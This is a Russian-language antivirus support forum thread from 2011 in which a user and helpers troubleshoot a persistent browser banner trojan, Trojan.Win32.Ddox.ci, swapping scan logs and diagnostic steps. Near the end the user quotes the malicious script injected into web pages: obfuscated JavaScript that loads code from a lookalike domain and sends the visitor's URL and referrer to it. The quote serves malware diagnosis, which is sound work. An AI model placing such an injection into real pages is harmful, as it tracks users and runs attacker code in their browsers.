174 ответов в этой теме

[lawpin]

Здравствуйте.
Очень удивило отсутствие упоминаний об этой гадости на форуме, хотя на virusinfo вся ветка помощи пестрит сообщениями о нём.
Являюсь владельцем DrWEB Enterprise Suite, и на одной машине начал вылазить баннер в браузере (IE/Mozilla) с уведомлением оTrojan.Win32.Ddox.ci.

Пытался получить помощь на virusinfo.info, пока безуспешно.
Повторюсь, что сканировал систему касперским и куритом с лайв сиди - вирусов нет!
Спайдер ни о чем подозрительном не сообщает.
Во время лечения утилитой avz, временно баннер "пропадал", но при попытках хождения по просторам, буквально на 2-3 странице начинали появляться ошмётки html кода, а после и вновь образовавшийся баннер.
Куда копать? кому жаловаться?

Сообщение было изменено lawpin: 23 Июнь 2011 - 10:22

[YVS]

Сделайте логи по правилам раздела

[lawpin]

логи

Прикрепленные файлы:

•  logs.zip   40,09К   44 Скачано раз

[lawpin]

кстати о drweb-scan.bat
он видимо не совсем универсален и не работает в моем случае с DrWEB Ent, никакой сканер во время проверки запущен не был.
скрипт весело сформировал лог и открыл папку test.

[Полимер]

Попробовать отправить этот файл C:\WINDOWS\TEMP\GuardGuard.exe
1. http://www.virustotal.com/index.html, ссылку на результат сюда
2. https://vms.drweb.com/sendvirus/?lng=ru
3. пофиксить его в HijackThis

Сообщение было изменено Полимер: 23 Июнь 2011 - 12:59

[lawpin]

Попробовать отправить этот файл C:\WINDOWS\TEMP\GuardGuard.exe
1. http://www.virustotal.com/index.html, ссылку на результат сюда
2. https://vms.drweb.com/sendvirus/?lng=ru
3. пофиксить его в HijackThis

довольно распространенная погремушка от mail.ru, что идет в комплекте с mail агентом.
VT результат дальше с этим файлом манипуляции проводить не вижу смысла.

Чтобы сэкономить наше с Вами время, гляньте одним глазком на ветку в virusinfo.info, что я приводил в первом посте. Все примитивные и явные намёки на вирусы сначала я вырезал своими руками, потом повторно прошлись с хелперами.
Еще раз обращаю внимание читающих и думающих система была полностью просканирована с livecd с нулевым результатом! Dr.Web CureIt! и Kaspersky Virus Removal Tool 2010 от 21.06.2011.

Спасибо за Ваше внимание и время.

[Borka]

Проверьте на ВирусТотал:
C:\WINDOWS\System32\Drivers\StarOpen.SYS
Знаете, что это:
O15 - Trusted Zone: http://www.td.tagaz.ru
?

Вопрос: на одних ли и тех же сайтах выпадает банер? Может ли появиться банер, если просто загрузить ФФ без загрузки страницы? Судя по ВИ, банер во всех браузерах. Запустите сканер при загруженном браузере и сделайте "Быструю" проверку.

[lawpin]

ответ вирустотала
Зона наша, это не вирус.
Если грузить ФФ без страниц - это обновлять локальный бланк? ничего не проявляется.
Только при запросе по сети.
Любые сайты.
На данный момент пропускает через себя запросы и кусками выдает html (обновил страницу - в браузере html с серидины/конца/начала страницы, но 80% времени не выдает полный ответ сервера). Быстрая проверка ничего не выявляет, сейчас оставил сканировать дальше.. но в памяти ничего не видит, файлы пока не все просканировал.

Вирус ведет себя одинаково, браузеры на неполный html каждый по своему реагируют.
Сканит только http, https видимо разобрать не может, проверял на gmail.com.
Со 100% вероятностью проявляется на mail.ru и exist.ru (основной "рабочий сайт") часто на яндексе.

Сейчас даже после отключения ADBlock в ФФ баннер не проявляется - постоянно битый html.

[Borka]

Лог будет?

[lawpin]

вирусов не обнаружено.

Добился возвращения баннера. В том числе и на локальном адресе (есть веб морда для локальной почты)!

Прикрепленные файлы:

•  drweb32w.zip   106,51К   15 Скачано раз

Сообщение было изменено lawpin: 23 Июнь 2011 - 14:08

[Borka]

c:\windows\system32\drivers\utg4otiw.sys - АВЗ?

Лог обрезан. Удалите (переименуйте) drweb32w.log, затем запустите сканер, настройте полную детализацию лога и сделайте только "Быструю" проверку.

[lawpin]

c:\windows\system32\drivers\utg4otiw.sys - АВЗ?

В системе нет такого файла

лог готовится.

[lawpin]

лог

Прикрепленные файлы:

•  drweb32w.zip   52,66К   15 Скачано раз

[Borka]

Пока идей нет.
Давайте посмотрим лог AutoRuns.

[lawpin]

Лог прикрепил.
Обратил внимание на C:\Windows\TempFile

Размер 8,01 МБ (8 405 015 байт)

Создан: 14 сентября 2009 г., 17:35:10
Изменен: 23 июня 2011 г., 8:57:48
Открыт: 23 июня 2011 г., 8:57:48

Для чтения закрыт, при попытке копирования в карантин при помощи avz - превращается в 32МБ файл!

попробую вырезать.. дата изменения/открытия - утренний запуск ПК.

Прикрепленные файлы:

•  AutoRuns.zip   73,68К   12 Скачано раз

[Borka]

Ничего не вижу.
Единственная оставшаяся идея - снести все от Мыл.ру...

[lawpin]

играю в эксперименты
убираю из интернета машину, захожу на локальный почтовик - баннера нет
добавляю интернет - появляется баннер - снова убираю - баннер исчезает :\

[lawpin]

в общем пытаюсь отследить движение с Procmon, а пока на закуску знатокам.. скрипт что добавляется в тело страницы.

...

<script>if&#40;self==top&#41;{ document.write&#40;&#34;<script src=&#39;http&#34; + &#40;&#40;&#34;https&#58;&#34; == document.location.protocol&#41; ? &#34;s&#34; &#58; &#34;&#34;&#41; + &#34;&#58;//qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran=&#34;+encodeURIComponent&#40;&#34;tS3NkLiAAhxjM7TlwYhwd4cy1s2BTxwnGB+VjWbn2UHTQvtd/HWxXSd5+XMsuFWA&#34;&#41;+&#34;&r=&#34;+escape&#40;document.referrer&#41;+&#34;&u=&#34;+escape&#40;document.URL&#41;+&#34;&v=351&&#34;+Math.random&#40;&#41;+&#34;&#39;>&#34;+unescape&#40;&#34;%3C/script%3E&#34;&#41;&#41;;}</script>

[Ko6Ra]

lawpin, можно вас попросить сделать две вещи?
1) Установить какой-нибудь другой браузер, отличный от имеющихся и проверить как в нем обстоят дела. Этим мы сможем определить каким именно образом работает эта штука.
2) Сделайте, пожалуйста, shark режим сканера при запущенном браузере.
Как оно делается описано вот тут
У Вас команда запуска будет
"C:\Program Files\DrWeb Enterprise Suite\drweb32w.exe" /shark
и лог прикрепите сюда в архиве.

[Ko6Ra]

Желательно отчет shark режима сканера собрать с использованием ftp://ftp.drweb.com/pub/drweb/tools/dwsysinfo.exe
Практически полную картину в итоге получим.